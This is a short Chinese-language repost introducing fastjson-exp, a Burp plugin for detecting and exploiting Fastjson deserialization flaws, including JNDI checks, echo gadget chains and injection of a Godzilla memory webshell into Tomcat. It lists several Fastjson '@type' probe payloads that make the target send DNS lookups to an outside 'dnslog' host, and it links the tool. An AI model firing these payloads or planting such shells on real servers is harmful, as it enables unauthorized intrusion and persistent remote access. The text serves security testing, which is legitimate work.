===================================
0x01 工具介绍
fastjson利用,burp插件。支持出网 jndi利用检测,不出网 tomcat、spring回显,哥斯拉内存马,回显利用链为dhcp、ibatis、c3p0,内存马支持tomcat89。
0x02 安装与使用
1、加载到burp插件,自行选择echo、jndi、inject。探测存在后,发送Repeater自行修改请求头,回显在响应头。如下
2、测试环境
tomcat启动后,将war包放在webapps目录即(tomcat自带dhcp依赖),漏洞环境为1.2.24和1.2.47。
3、判断是否使用fastjon组件
4、点击 新增策略,通过增加策略来增加漏洞类型
dns ● {"@type":"java.net.Inet4Address","val":"dnslog"}
● {"@type":"java.net.Inet6Address","val":"dnslog"}
● {"@type":"java.net.InetSocketAddress"{"address":,"val":"dnslog"}}
● {{"@type":"java.net.URL","val":"http://dnslog"}:0
● {"@type":"com.alibaba.fastjson.JSONObject", {"@type": "java.net.URL", "val":"http://dnslog"}}""}
● Set[{"@type":"java.net.URL","val":"http://dnslog"}]
0x03 项目链接下载
https://github.com/skisw/fastjson-exp
原文始发于微信公众号(Web安全工具库):FastJson利用工具 -- fastjson-exp
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论